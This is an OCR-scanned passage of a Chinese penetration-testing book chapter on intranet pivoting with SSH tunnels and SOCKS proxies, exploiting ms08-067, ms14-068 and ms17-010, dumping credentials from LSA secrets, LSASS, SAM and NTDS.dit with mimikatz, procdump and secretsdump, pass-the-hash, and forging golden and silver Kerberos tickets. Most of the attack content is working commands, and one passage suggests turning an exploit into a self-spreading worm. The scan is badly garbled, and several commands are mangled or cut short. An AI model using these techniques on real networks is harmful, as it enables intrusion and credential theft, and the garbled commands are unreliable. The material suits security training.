@ 本 地 转发 。 本 地 访问 127.0.0.1: port1 就 是 host: port2， 即 : 


ssh -CfNg -L port1:127.0.0.1:port2 user@host 


@ 远 程 转发 。 访 问 host: port2 就 是 访问 127.0.0.1: port1， 即 : 


ssh -CfNg -R port2:127.0.0.1:portl1 user@host ， 


12.2.2 Socks 代 理 


Socks 是 一 种 代理 服务 ， 可 以 将 两 新 系统 连接 起 来 ， 支 持 多 种 协议 ， 包 括 HTTP、HTTPs、SSH 等 其 他 
类 型 的 请 求 ， 标 准 端 口 为 1080。 Socks 分 为 Socks4 和 Socks5 两 种 ，Socks4 只 支持 TCP， 而 Socks5 支 
持 TCP/UDP 和 各 种 身份 验证 协议 。 


9ocks 代 理 在 实际 的 渗透 测试 中 运用 广泛 ， 能 帮助 我 们 更 快速 、 便 捷 地 访问 目标 内 网 的 各 种 服务 资 
源 ， 比 应 口 转 友 更 加 实用 。 


1. 利用 SSH 做 Socks 代 理 


下 面 的 1.1.1.1 均 被 假设 为 个 人 服务 器 的 IP。 本 地 运行 : 


elh -qTfnN = 1080 oo el | | 


最 终 会 企 本 地 127.0.0.1 开 放 1080 谓 口 ， 连 接 后 便 是 代理 1.1.1.1 进 行 访问 。 


在 渗透 过 程 中 ， 知 能 拿 到 9sH 密 码 ， 并 且 SsH 端 口 是 对 外 开放 的 ， 这 时 可 以 用 上 面 的 合 令 ， 方 便 地 进 
行 Socks 代 理 。 但 是 很 多 情况 下 没有 办 法 直接 连接 SSH， 那 么 可 以 按照 下 面 的 流程 进行 。 


(1) 在 目 己 的 服务 器 上 修改 /etc/ssh/sshd_config 文 件 中 的 GatewayPorts 为 “yes”， 从 而 让 本 地 
监听 的 0.0.0.0:8080 而 不 是 127.0.0.1:8080， 这 样 在 公 网 上 可 以 进行 访问 。 


(2) 在 目标 机 器 上 执行 “ssh-p 22-qngfNTR 6666:localhost:22 root@1.1.1.1” 命令 ， 把 目标 机 器 
的 22 疹 口 转 友 到 了 1.1.1.1:6666。 
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(3) 在 个 人 服务 器 1.1.1.1 上 执行 “ssh-p 6666-qngfNTD 6767 root@1.1.1.1” 命 令 ， 通 过 1.1.1.1 
的 6666 端 口 即 目 标的 22 端 口 进行 SSH 连 接 ， 最 终 会 映射 出 6767 端 口 。 
(4) 然后 便 可 以 通过 1.1.1.1:6767 做 代理 进入 目标 网 络 。 
2. 利用 Venom 做 Socks 代 理 


Venom 也 能 进行 Socks 代 理 ， 并 且 由 于 不 用 手动 地 在 每 台 主 机 上 执行 监听 并 转发 ， 因 此 步骤 非常 简 
单 。 同 样 ， 我 们 需要 控制 第 一 台 机 器 ， 上 传 agent 节 点 端 ， 并 且 主 动 连接 admin 端 。 获 取 节 点 连接 
后 ， 使 用 “goto [node id] ”命令 进入 该 和 节点， 使 用 “socks 1080” 命令 任 本 地 开局 一 个 Socks5 服 
务 端口 。 而 该 端口 代理 的 就 是 目标 节点 的 网 络 ， 通 过 1080 端 口 的 请 求 ， 都 会 通过 目标 节点 进行 转发 ， 
从 而 实现 代理 功能 。 


在 开启 端口 后 ， 需 要 使 用 proxychains 对 命令 行程 序 进行 代理 。 这 里 需要 配置 代理 端口 ， 配 置 文件 路 
径 为 /etc/proxychains.conf， 人 在 最 后 一 行 添 加 需要 代理 的 新 口 地 址 ， 见 图 12-2-13。 


Sse 
然后 可 以 通过 Socks5 代 理 访问 内 网 其 他 主机 ， 见 图 12-2-14。 





12-2-14 
如 果 无 法 访问 其 他 主机 服务 ， 请 记得 关闭 Windows 防 火 墙 。 
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12.3 剃 见 油 洞 利用 方式 


本 节 将 介绍 Metasploit 中 一 些 典型 的 漏洞 利用 (Exploit) 、 影 响 的 版 本 和 用 法 演示 ， 读 者 请 及 时 更 
Metasploit 来 获取 最 新 的 利用 。 


12.3.1 ms08-067 


ms08-067 是 一 个 十 分 古老 的 漏洞 ，Windows Server 服 务 在 处 理 特 制 RPC 请 求 时 存在 缓冲 区 溢出 派 
洞 ， 远 程 攻击 者 可 以 通过 友 大 恶意 的 RPC 请 求 触 皮 这 个 漏洞 ， 导 致 完全 入 侵 用 户 系统 ， 以 SYSTEM 权 
限 执行 任意 指令 。 对 于 Windows 2000/XP 和 Windows Server 2003， 无 需 认证 便 可 以 利用 这 个 漏 
洞 。 


首先 使 用 smb version 模 块 判断 系统 版 本 ， 见 图 12-3-1， 版 本 为 Windows XP SP3， 则 使 用 exploit/ 
windows/smby/ms08 067 netapi 模 块 进行 攻击 尝试 ， 配 置 参数 。 这 里 使 用 proxychains 代 理 ， 
na Eel Mlel:Te US AE 


eta 


图 12-3-2 


然后 我 们 就 可 以 使 用 mimikatz 读 取 密 码 ， 见 图 12-3-3。 


meterpreter 操 作 可 以 参考 如 下 资源 : https://www.offensive-security.com/metasploit- 
unlea 


/meterpreter-basics/。 


Load mlLmlLKkKatz 


a i re ekE 
Lng extLells LON Mlllll K = 与 
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AuthID Package Doma1in User Password 


人 mm mm 


Negotiate NT AUTHORITY LOCAL SERVICE 
HEEL? Negotiate NT AUTHORITY NETWORK SERVICE 
0;30000 NILM 

| 

| 





EEL 


NTLM WURKORUUP 】EEs 一 4 只 > 4F > 日 A455$ 
NTLM TEST-4A54F50A45 Administrator 


6;999 











日 ;7 日 7 


12.3.2 ms14-068 


针对 ms14-068 漏 洞 攻击 的 防御 检测 方法 已 经 很 成 熟 ， 其 中 关键 的 Kerberos 认 证 知识 将 在 12.5.2.1 节 
中 介绍 。 因 为 Kerberos 没 有 对 权限 进行 验证 ， 所 以 微软 在 实现 的 Kerberos 协 议 中 加 入 了 PAC a 

Attribute Certificate， 特 权 属 性 证 书 ) ， 记 录用 户 信息 和 权限 信息 。KDC 和 服务 器 依据 PAC 中 
的 权限 信息 控制 用 户 的 访问 。 漏 洞 的 根本 原因 在 于 KDC 人 允许 用 户 伪造 PAC， 再 使 用 指定 算法 加 解密 ， 


TGS-REQ 请 求 囊 有 伪造 扁 权限 用 户 的 PAC， 返 回 的 票据 就 具有 了 高 权限 。 该 漏洞 影响 版 本 如 下 : 


In 


Server 2003，Windows Server 2008 ，Windows Server 2008 R2，Windows Server 


，Windows Server 2012 R2 。 


当然 ， 该 漏洞 也 有 相应 的 前 置 条 件 : 有 效 的 域 用 户 和 口令 ， 域 用 户 对 应 的 sid， 域 控 地 址 ，Window 
7 以 上 系统 。 注 意 ， 操 作 系 统 要 求 Windows 7 以 上 ， 是 因为 Windows XP 不 支持 导入 ticket， 如 果 攻 
击 机 是 Linux， 则 可 忽略 。 


这 里 拿 impacket 族 件 (https://github.com/SecureAuthCorp/impacket) 中 的 goldenPac.py 举 
例 ， 使 用 参数 见 图 12-3-4， 以 曾经 参加 的 比赛 为 例 ， 谷 令 如 下 : 


python goldenpac.py web. LCtf: com/buguake:xdsec@lctf2018@sub-dc .web.lctf.com -dc-ip 172.21.0.7 
-target-ip 172.21.0.7 cmd NS PF 


A SE 


图 12-3-4 
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12.3.3 ms17-010 


ShadowBroker 释 放 的 NSA 工 具 中 的 eternalblue 模 块 ， 网 上 已 经 有 了 很 多 的 分 析 ， 在 此 不 再 蒙 述 ， 
这 里 只 演示 在 相应 环境 中 的 利用 。 影 响 版 本 如 下 。 


个 需 要 凭证 版 本 : Windows 2016 X64，Windows 10 Pro Build 10240 X64，Windows 2012 R2 
X64, Windows 8.1 X64, Windows 8.1 X86, 


@ 不 需要 凭证 版 本 : Windows 2008 R2 SP1 X64, Windows 7 SP1 X64, Windows 2008 SP1 A 
, Windows 2003 R2 SP2 X64, Windows XP SP2 X64, Windows 7 SP1 X86, Windows 2008 
SP1 X86, Windows 2003 SP2 X86, Windows XP SP3 X86, Windows 2000 SP4 X86, 


注意 ， 有 的 系统 会 需要 认证 ， 这 就 涉及 匿名 用 户 ( 空 会 话 ) 访问 命名 管道 ， 因 为 新 版 Windows 的 默认 
配置 限制 了 匿名 访问 。 从 Windows Vista 开 始 ， 默 认 设 置 不 允许 匿名 访问 任何 命名 管道 ， A 
indo 
8 开始 ， 默 认 设置 不 允许 匿名 访问 IPC$ 共 享 。 


首先 使 用 scanner/smb/smb ms17 010 对 目标 机 器 进行 扫 摘 ， 是 售 仓 在 永恒 之 监 ， 见 图 12-3-6。 


图 12-3-6 


这 里 也 推荐 https://github.com/worawit/MS17-010， 通 用 性 较 高 ， 因 为 测试 目标 版 本 比较 低 ， 
所 以 使 用 其 中 的 zzz exploit.py， 在 使 用 前 修改 smb pwn 阔 数 的 一 些 方法 ， 默认 是 在 ( 盘 创建 一 个 
文件 ， 直 接 修改 成 执行 命令 或 者 上 传 可 执行 文件 ， 见 图 12-3-7。 


然后 使 用 Metasploit 生 成 一 个 名 为 bind86.exe 的 可 执行 文件 放 入 脚本 执行 目录 中 ，Metasploit 监 | 
( 见 图 12-3-8) ， 然 后 执行 利用 脚本 后 得 到 目标 session。 
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这 里 只 是 演示 了 zzz_exploit 一 种 用 法 ， 建 议 读者 自行 阅读 py 脚本 来 挖掘 其 他 的 利用 方式 ， 如 可 以 写成 
ms17010 蠕 虫 ， 编 译 成 EXE 文 件 目 动 传播 等 。 


Er 





























图 12-3-7 


Pe 一 = na Ca 2 ee | 
| 
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12.4 获取 认证 作证 


收集 内 网 身份 凭证 是 一 般 横向 移动 的 前 置 条 件 ， 当 获取 到 足够 有 效 的 身份 凭证 时 ， 横 向 移动 会 变 得 游 
I= yA /le oN Ea Ny 


12.4.1 获取 明文 身份 凭证 


日 常用 户 接 触 最 多 的 身份 凭证 载体 便 是 明文 密码 了 ， 在 Windows 的 认证 机 制 中 ， 不 少 环节 会 将 明文 以 
各 种 各 样 的 形式 留存 在 主机 中 。 下 面 介 绍 攻 击 者 获取 明文 密码 的 常用 手段 。 


12.4.1.1 LSA Secrets 


LSA Secrets 是 Windows 身 份 验证 体系 (Local Security Authority，LSA) 中 用 来 保存 用 户 重 要 信息 
的 特殊 保护 机 制 。LSA 作 为 管理 系统 的 本 地 安全 策略 ， 负 责 审 核 、 验 证 ， 将 用 户 登 录 到 系统 ， 并 存储 
私有 数据 。 而 用 户 和 系统 的 敏感 数据 都 存储 在 LSA Secrets 注 册 表 中 ， 只 有 系统 管理 员 权 限 才 能 访 
问 。 


1. LSA Secrets 位 置 


LSA Secrets 在 系统 中 是 以 注册 表 的 形式 存储 的 ， 其 注册 表 位 置 为 ( 见 图 12-4-1) : HKEY LOCAL 
MACHINE/Security/Policy/Secrets。 其 安全 访问 设置 为 只 允许 system 组 的 用 户 拥 有 所 有 权限 。 


File Edit View Favorites Help 
4 WW Computer 
Db -BD HKEY CLASSES ROOT 
Db DD HKEY CURRENT_USER 
4 HKEY LOCAL MACHINE 


添加 管理 员 访 问 权 限 并 重新 打开 注册 表 时 ， 会 显示 LSA Secrets 的 子 目录 ( 见 图 12-4-2) 。 
他 $MACHINE.ACC : 有 关 域 认证 的 信息 。 
伴 DefaultPassword: 当 autologon 开 启 时 ， 存 放 加 密 后 的 密码 。 
入 NL$KM: 用 于 加 密 缓存 域 密码 的 密 钥 。 
L$RTMTIMEBOMB: 存储 上 一 次 用 户 活跃 的 日 期 。 
此 位 置 包含 了 被 加 密 的 用 户 的 密码 。 但 是 ， 其 密 钥 和 存储 在 父 路 径 Policy 中 。 


2. 如 何 获取 明文 密码 
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(1) 模拟 场景 ， 设 置 AutoLogon 


sysinternals 工 具 套件 的 AutoLogon 可 以 方便 地 设置 AutoLogon 相 关 信 息 ( 见 图 12-4-3) 。 参 见 网 


页 : https://docs.microsoft.com/en-us/sysinternals/downloads/autologon。 
(2) 复制 注册 表 项 


需要 复制 的 注册 表 项 有 HKEY LOCAL MACHINE\SAM、HKEY LOCAL MACHINE\SECURITY、 
HKEY LOCAL MACHINEN\SYSTEM 


利用 系统 目 市 的 命令 复制 注册 表 项 (需要 管理 员 权限 ) ， 执 行 如 下 命令 : 





国 HKEY_CLASSES_ROOT 
国 HKEY_CURRENT_USER 


下 


虱 
出 
出 
出 
- 遇 
|- 加 
"地 
-地 


AutoLogon 





Autologon successfully configured. 


Note: The autologon password is encrypted 




















图 12-4-3 
C:\> reg.exe Save hklm\sam C:\sam.save 


C:\> reg.exe save hklm\security C:\security.save 
C:\> reg.exe save hklm\system C:\system.save 


将 导出 的 三 个 文件 放 入 Impacket\examples 文 件 夹 中 ， 使 用 Impacket 中 的 secretsdump 脚 本 加 载 : 


secretsdump .py -sam sam.save -security securi 


在 返回 结果 ( 见 图 12-4-5) 中 可 看 到 DefaultPassword 项 中 出 现 了 明文 密码 。 返 回 结果 中 的 其 他 重要 
项 将 在 后 面 介 绍 。 





图 12-4-5 


关于 LSA 的 详细 细节 ， 感 兴趣 的 读者 可 以 去 MSDN 自 行 了 解 : https://docs.microsoft.com/en- 
U 
/windows/desktop/secauthn/lsa-authentication。 


12.4.1.2 LSASS Process 
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LSASS (Local Security Authority Subsystem Service， 本 地 安全 性 授权 服务 ) 用 来 进行 
系统 安全 策略 的 实施 。 为 了 支持 WDigest 和 和 SSP 身份 认 证 ，LSASS 使 用 明文 存储 用 户 身 份 凭证 。 
年 ， 微 软 推出 了 补 JB2871997， 防 止 此 特性 被 滥用 ， 不 过 该 补丁 只 是 提供 了 是 否 内 存 存 储 明 文 

密码 的 选项 ， 并 不 能 完全 防御 攻击 。Windows Server 2012 R2-2016 上 默认 禁 用 了 WDigest。 其 注册 

表 位 置 为 : HKEY LOCAL MACHINE\System\CurrentControlSet\Control\SecurityProviders 

\WDigest。 如 果 UseLogonCredential 的 值 设置 为 0， 则 内 存 中 不 会 存放 明文 密码 ， 否 则 内 存 中 会 存 

放 明 文 密码 。 


实际 上 ， 当 攻击 者 有 足够 权限 时 ， 完 全 可 以 主动 修改 此 项 内 容 。 当 值 修改 成 功 后 ， 下 一 次 用 户 登 录 时 
等 会 采用 新 的 策略 。 


LSASS (本 地 安全 认证 子 系统 服务 ) 是 Windows 操 作 系 统 的 一 个 内 部 程序 ， 负 责 运 行 Windows 系 统 
安全 政策 ， 以 进程 形式 运行 并 工作 。 


LSASS 是 以 进程 的 形式 运行 ， 而 我 们 需要 获取 其 进程 的 内 存 。 这 里 有 两 种 方法 可 以 实现 : 
(1) 使 用 mimikatz 


使 用 mimikatz 提 取 密 码 ， 命 令 如 下 ， 结 果 见 图 12-4-6。 





(2) 使 用 procdump 


使 用 procdump 转 储 lsass 进 程 ， 命 令 如 下 ， 结 果 见 图 12-4-7: 


eula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 
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图 12-4-7 
使 用 mimikatz 从 转 储 文件 中 提取 密码 ， 命 令 如 下 : 


sekurlsa: :minidump lsass.dmp 
sekurlsa: :LogonPasswords full 


使 用 mimikatz 提 取 固 然 方便 ,但 已 被 大 部 分 反 病 毒 软件 列 入 了 查 杀 名 单 。 推 荐 优先 使 用 procdump 转 
和 储 进程 后 ， 在 本 机 离线 提取 密码 。 


12.4.1.3 LSASS Protection bypass 


由 于 LSASS 可 以 被 转 储 内 存 的 脆弱 性 ， 微 软 在 Windows Server 上 添加 了 LSASS 保 护 机 制 ， 保 护 其 无 


法 被 转 储 。 保 护 机 制 开 关 位 于 注册 表 地 址 : HKEY LOCAL MACHINEN\SYSTEMA\ 
CurrentControls 
\Control\Lsa, 


值 名 为 RunAsPPL (32 位 浮 点 类 型 ) ， 需 要 管理 员 上 自行 添加 并 设置 其 值 为 1， 重 启 后 生效 ( 见 图 12-4- 
8) 。 针 对 这 个 机 制 可 以 使 用 mimikatz 提 供 的 驱动 强行 去 除 保护 ， 命 令 序列 如 下 ， 结 果 见 图 12-4-9: 


z> privilege::debug # 提升 为 System 权限 
Z> !+ # 加 载 驱 动 

atz> !processprotect /process:lsass.exe /remove # 使 用 驱动 去 除 进程 保护 
z> sekurLsa: :Logonpasswords # 提取 内 存 中 的 密码 





图 12-4-8 


图 12-4-9 


12.4.1.4 Credential Manager 


Credential Manager 存 储 着 Windows 登 录 赁 据 ， 如 用 户 名 、 密 码 和 地 址 。Windows 可 以 保存 此 数 
据 ， 以 便 在 本 地 计算 机 、 同 一 网 络 的 其 他 计算 机 、 服 务 器 或 网 站 等 上 使 用 。 此 数据 可 由 Windows 本 身 
或 文件 资源 管理 器 、Microsoft Office 等 应 用 程序 和 程序 使 用 ( 见 图 12-4-10) 。 
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图 12-4-10 
可 以 使 用 mimikatz 直 接 获 取 ( 见 图 12-4-11) : 


Mimikatz> pri a :debug 
Mimikatz> sekurlsa: :credman 


图 12-4-11 


12.4.1.5 在 用 户 文 件 中 寻找 身份 凭证 Lazange 


Lazange 为 本 机 信息 收集 一 大 利器 ， 应 该 是 本 机 凭证 收集 ， 采 集 包 括 浏览 器 、 聊 天 软件 、 数 据 库 、 游 
戏 、Git、 邮 件 、Maven、 内 存 、Wi-Fi、 系 统 凭证 的 多 个 维度 、 多 个 路 线 的 凭证 信息 ， 并 且 支 持 
eloleoMAS 
、Linux、Mac 系 统 ， 命 令 参 数 解 析 见 图 12-4-12， 结 果 见 图 12-4-13。 


12.4.2 获取 Hash 身 份 任 证 


12.4.2.1 通过 SAM 数 据 库 获取 本 地 用 户 Hash 任 证 


SAM (Security Accounts Manager) 数据 库 是 Windows 系 统 保 存 本 地 用 户 身份 凭证 的 地 方 ， 而 保 
存在 SAM 数 据 库 的 身份 凭证 格式 为 NTLM Hash。SAM 存 放 在 注册 表 中 ， 位 置 为 HKEY_LOCAL dE 
\SAM。 读 取 SAM 数 据 库 需要 system 权 限 。 


获取 NTLM Hash 的 手段 具体 分 为 两 种 。 
(1) 在 目标 机 器 上 获取 NTLM Hash 


Mimikatz 命 令 如 下 : 


laZagne.exe all -quiet -oN 


指定 模块 
静默 模式 


输出 格式 


图 12-4-12 
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sk 


Mimikatz> privilege::debug 
e 


(2) 在 目标 机 器 上 导出 SAM 数 据 库 ， 并 在 本 地 进行 解析 
以 下 两 种 导出 方式 都 需要 以 管理 员 权限 运行 : 
OEI::lelVID ee 


reg save HKLM\system system 


使 用 Powershell: 


Powershell 地 址 如 下 : 人 人 
xTiltration 
VMeLIN I Ele NA oC: 


Powershell>Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination 
"C:\windows\temp\system" 

Powershell>Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination 
"C:\Windows\temp\sam" 


然后 本 地 从 SAM 中 提取 NTLM Hash 的 操作 有 以 下 两 种 方式 。 


Q@ 使 用 Mimikatz， 命 令 如 下 : 


@ 使 用 Impacket， 命 令 如 下 : 
https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py 


12.4.2.2 通过 域 控制 器 的 NTDS.dit 文 件 


如 同 SAM 对 于 本 机 的 作用 ,NTDS.dit 是 保存 域 用 户 身 份 作 证 的 数据 库 ， 和 存放 在 域 控制 器 上 。 其 存放 
路 径 在 Windows Server 2019 中 为 C:\Windows\System32\ntds.dit， 低 版 本 的 为 C:\Windows\ 
\NTDS.dit。 成 功 获得 域 控 后 ， 束 可 以 获取 所 有 用 户 的 身份 作证， 可 用 于 后 续 阶段 的 维持 权限 。 


提取 存放 的 身份 凭证 有 以 下 两 种 方式 。 
1. 远程 提取 
用 impacket 中 的 secretsdump.py 脚 本 ， 通 过 dcsync 远 程 提 取 密 码 Hash ， 命 令 如 下 : 


secretsdump .py -just-dc administrator:P@ssword@192.168.40.130 


结果 见 图 12-4-14。 
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图 12-4-14 
2. 本 地 提取 


(1) 将 ntds.dit 复 制 到 本 地 ， 用 impacket 解 析 提 取 


由 于 ntds.dit 需 要 使 用 SYSTEM 中 的 bootKey 进 行 解析 ， 因 此 需要 复制 YSTEM。 这 些 文件 无 法 直接 复 
制 ， 我 们 可 以 使 用 VSSs 卷 影 复 制 ， 脚 本 地 址 如 下 : Teoma te 有 
o 
/master/Gather/Copy-VSS.ps1. 


此 脚本 直接 将 SAM、SYSTEM、ntds.dit 复 制 到 用 户 可 控 的 地 方 ， 见 图 12-4-15。 


固 管理 员 : Windows powerShell 


眉 改 日 需 


2019/3/13 17:37 
2019/4/8 22:02 
2019/4/12 1222 


图 12-4-15 
impacket 中 的 secretsdump.py 脚 本 实现 了 使 用 system 中 的 boot key 对 ntds.dit 解 密 提取 密码 Hash 
的 功能 ,命令 如 下 (结果 见 图 12-4-16) : 


python secretsdump.py -ntds /tmp/ntds.dit -system /tmp/system.hiv LOCAL 





图 12-4-16 
(2) 用 mimikatz 


Mimikatz 通 过 dcsync 特 性 获取 本 机 ( 域 控 ) 的 ntds.dit 数 据 库存 储 的 Hash。 命 令 为 如 下 ( 结 图 
-4-17) : 


lsadump: :dcsync /domain:Lzly.Lab /all /csv 


© mimikatz 2.2.0 x64 (oe.e0) 
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图 12-4-17 
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12.5 横 同 移动 


在 线 下 的 靶场 渗透 中 ， 我 们 经 常会 遇 到 有 域 的 情况 。 这 里 介绍 两 种 Windows 横 向 移动 中 经 常会 使 用 到 
的 技术 、 涉 及 的 原理 和 利用 方式 。 测 试 环 境 如 下 。 


@ 域 控制 器 : 
% 操作 系统 : Windows Server 2012 R2 X64.。 
: Scanf.com。 
他 IP 地 址 : 172.16.20.10。 
@O 域 内 主机 : 
操作 系统 : Windows Server 2012 R2 X64。 
: Scanf.com。 


他 |P 地 址 : 172.16.20.20。 


12.5.1 Hash 传 歼 


在 进行 Hash 传 递 (Past The Hash) 前 需要 了 解 Windows 的 LM Hash、NTLM Hash 和 Net NTLM 
Hash 三 者 之 间 的 差别 。 


GOLM Hash: 只 用 于 者 版 本 Windows 系 统 登 录 认 证 ， 如 Windows XP/2003 以 下 系统 ， 微 软 为 了 保证 
系统 兼容 性 ， 在 Windows Vista 后 的 操作 系统 中 依然 保留 ， 但 LM 认证 默认 禁用 ，LM 认 证 协议 基本 淘 
汰 ， 而 采用 NTLM 来 进行 认证 。 


Q@NTLM Hash: 主要 用 于 Windows Vista 及 之 后 的 系统 ，NTLM 是 一 种 网 络 认证 协议 ， 认 证 过 程 需 
要 NTLM Hash 作 为 凭证 参与 认证 。 在 本 地 认证 的 流程 中 是 把 用 户 输入 的 明文 密码 加 密 转 化 为 NTLM 
Hash 与 系统 SAM 文 件 中 的 NTLM Hash 进 行 比较 。 抓 取 后 可 以 直接 用 于 Hash 传 递 也 可 以 在 objectif- 
破解 ， 见 图 12-5-1。 
GNet NTLM Hash: 主要 用 于 各 种 网 络 认 证 ， 由 于 加 密 方式 不 同 衍生 了 一 些 不 同 的 版 本 ， le 
1、NetNTLMv1ESS、NetNTLMv2。 通 过 钓鱼 等 方式 窃取 到 Hash 的 几乎 都 是 这 个 类 型 。 注 意 ， 
Net NTLM Hash 不 能 直接 用 于 Hash 传 递 ， 但 可 以 通过 smb 中 继 来 利用 。 
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I 
图 12-5-1 
当然 ， 以 上 三 种 Hash 都 支持 暴力 破解 ， 如 果 Hashcat 在 硬件 支持 的 情况 下 ， 爆 破 速 度 将 非常 可 观 。 
在 进行 内 网 渗透 时 ， 当 我 们 获取 到 某 个 用 户 的 NTLM hash 时 ， 无 法 得 到 明文 口令 ， 就 可 以 通过 Hash 
传递 来 利用 。 注 意 ， 微 软 在 2014 年 5 月 13 日 发 布 了 针对 Hash 传 递 的 补丁 KB2871997， 更 新 用 于 禁止 
本 地 管理 员 账 户 用 于 远程 连接 ， 这 样本 地 管理 员 无 法 以 本 地 管理 员 的 权限 在 远程 主机 上 执行 wmi、 
s 
等 。 然 而 在 实际 的 测试 中 发 现 常规 的 Hash 传 递 虽 已 无 法 成 功 ， 但 默认 administrator (sid s00) 
账号 除外 ， 即 使 改名 ， 这 个 账号 仍然 可 以 进行 Hash 传 递 攻击 。 


参考 网 页 : RA POSS D/O DN tr 让 
tm 


下 面 在 预 设 环境 中 进行 演示 ， 假 设 读者 已 经 掌握 Windows Server 2012 R2 Active Directory 配 置 。 
已 知 信息 : User, scanf: Domain ，scanf: NTLM, cb8a428385459087a76793010d60f5dc。 


见 图 12-5-2 ， 在 测试 机 上 使 用 cobaltstrike 上 线 ， 然 后 执行 如 下 命令 : 


pth [DOMAIN\user] [NTLM hash] 


图 12-5-2 
然后 测试 是 否 能 访问 域 控 制 器 ， 这 里 的 scanf 账 号 为 域 管 理 员 ， 见 图 12-5-3 发 现 已 经 可 以 成 功 访问 。 


12.5.2 票据 传递 


12.5.2.1 Kerberos 认 证 


在 进行 票据 传递 (Pass The Ticket) 前 需要 简单 介绍 Kerberos 协 议 。 在 域 环 境 中 ，Kerberos 协 议 被 
用 来 身份 认证 ， 图 12-5-4 即 一 次 简单 的 身份 认证 流程 。 


~ Key Distribution Center : 
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fA 


一 一 
二 一 一 一 一 一 一 一 6 一 一 一 一 一 一 一 一 一 一 


用 户 
图 12-5-4 
人 KDC (Key Distribution Center) : 密 钥 分 发 中 心 ， 包 含 AS 和 TGS 服 务 。 


他 AS (Authentication Server) : 身份 认证 服务 。 
作 TGS (Ticket Granting Server) : 票据 授权 服务 。 


他 TGT (Ticket Granting Ticket) : 由 身份 认证 授予 的 票据 ， 用 于 身份 认证 ， 存 储 在 内 存 
中 ， 默 认 有 效 期 限 为 10 小 时 。 


一 般 ， 域 控制 器 器 是 KDC， 而 KDC 使 用 的 密 钥 是 krbtgt 账 号 的 NTLM Hash， 同 时 krbtgt 账 号 注册 了 
一 个 SPN (Service Principal Name， 服 务 器 主体 名 称 ) 。SPN 是 服务 使 用 Kerberos 身 份 认 证 的 网 
络 中 唯一 的 标示 符 ， 由 服务 类 、 主 机 名 和 端口 组 成 。 在 域 中 ， 所 有 机 器 名 都 默认 注册 成 SPN， 当 访问 
一 个 SPN 时 ， 会 目 动 使 用 Kerberos 认 证 ， 这 也 是 在 域 中 使 用 域 管理 员 访问 其 他 机 器 不 需要 输入 账号 密 
码 的 原因 。 


用 户 输 入 用 户 密码 后 ， 就 会 进行 认证 ( 见 图 12-5-4) ， 流 程 如 下 。 


(1) As-REQ: 使 用 密码 转换 成 的 NTLM Hash 加 密 的 时 间 戳 作为 凭据 向 As 发 起 请 求 (包含 明文 用 户 
名 ) 。 


(2) AS-REP: KDC 使 用 数据 库 中 对 应 用 户 的 NTLM Hash 解 密 请 求 ， 如 果 解 密 正确 就 返回 由 KDC 密 
钥 (krbtgt hash) 加 密 的 TGT 票 据 。 


(3) TGS-REQ: 用 户 使 用 返回 的 TGT 票 据 向 KDC 发 起 特定 服务 的 请 求 。 


(4) TGS-REP: 使 用 KDC 密 钥 对 请 求 进行 解密 ， 如 果 结 果 正 确 就 使 用 目标 服务 的 账户 Hash 对 TGS 票 
据 进 行 加 密 并 返回 (无 权限 验证 ， 只 要 TGT 票 据 正 确 束 返 回 TGS 票 据 ) 。 


(5) AP-REQ: 用 户 向 服务 发 送 TGS 票 据 。 

(6) AP-REP: 服务 使 用 自己 的 NTLM Hash 解 密 ST。 

票据 传递 的 原理 在 于 拿 到 票据 ， 并 将 其 导入 内 存 ， 就 可 以 仿冒 该 用 户 获 得 其 权限 ， 下 面 将 介绍 常用 的 
两 种 票据 的 生成 及 使 用 。 


12.5.2.2 金 票据 


每 个 用 户 的 票据 都 是 由 krbtgt 的 NTLM Hash 加 密生 成 的 ， 如 果 我 们 拿 到 了 krbtgt 的 Hash ， 融 可 以 伪 
造 任意 用 户 的 票据 。 当 获得 域 控 权 限时 ， 就 可 以 用 krbtgt 的 Hash 和 mimikatz 生 成 任意 用 户 的 票据 ， 
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这 个 要 据 被 称 为 金 票据 (Golden Ticket) 。 由 于 是 伪造 的 TGT， 没 有 与 KDC 的 As 通信 ， 因 此 会 作为 
TGS-REQ 的 一 部 分 发 送 到 域 控 制 器 获取 服务 票据 。 


Key Distribution Center 


应 用 服务 器 


图 12-5-5 
前 置 条 件 : 域名 ， 域 sid， 域 krbtgt Hash (aes256 和 NTLM Hash 都 可 用 ) ， 伪 造 的 用 户 id。 


(1) 导出 krbtgt 的 Hash 


在 域 控 或 者 域内 任意 主机 域 管 理 权限 执行 ， 见 图 12-5-6。 


生成 金 票据 的 命令 如 下 (结果 见 图 12-5-7) 。 


mimikatz "kerberos::golden /user:scanfsec /domain:scanf.com /sid:sid /krbtgt:hash /endin:480 
/renewmax:10080 /ptt 











图 12-5-6 








图 12-5-7 
考 网 页 中 有 上 述 使 用 命令 的 详细 帮助 ， 这 里 束 不 再 过 多 的 曾 述 。 金 票据 使 用 时 需要 注意 以 下 下 几 
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学 域 Kerberos 策 略 默认 信任 票据 的 有 效 时 间 。 


学 krbtgt 密 码 被 连续 修改 两 次 后 金 票据 失效 。 


学 可 以 在 任意 能 与 域 控制 器 进行 通信 的 主机 上 生成 和 使 用 金 票据 。 
PAN: PA DD ES Ei 


参考 网 页 : https://github.com/gentilkiwi/mimikatz/wiki/module- ~ -kerberos。 


12.5.2.3 银 票 据 


银 票 据 (Silver Tickets) 是 通过 伪造 TGS Ticket 来 访问 服务 ， 但 是 只 能 访问 特定 服务 器 上 的 任意 服 
务 ， 通 信 流 程 见 图 12-5-8， 其 优点 在 于 只 有 用 户 和 服务 通信 没有 和 域 控制 器 (KDC) 通信 ， 域 控制 器 
上 无 日 志 可 作为 权限 维持 的 后 门 使 用 。 


金 票据 与 银 票 据 的 对 比如 下 : 


Key Distribution Center 


图 12-5-8 


伪造 TGS， 只 能 获取 指定 服务 权限 


由 服务 账户 《计算 机 帐户) Hash 加 


也 就 是 说 ， 只 要 手 里 有 了 银 票据 ， 就 可 以 跳 过 KDC 认 证 ， 直 接 去 访问 指定 的 服务 。 银 票据 访问 的 服务 
列表 如 下 : 


WMI HOST、 PRCSS 
PowerShell Remoting 

WinRM 

Scheduled Tasks 

Windows File Share 

LDAP 

Windows Remote Administration Tools RPCSS、 LDAP、 CIFS 


这 里 以 域 控 制 器 为 例 ， 假 设 已 经 获取 到 域 控制 器 的 权限 ， 后 期 权限 丢失 又 刚好 能 与 域 控制 器 通信 ， 需 
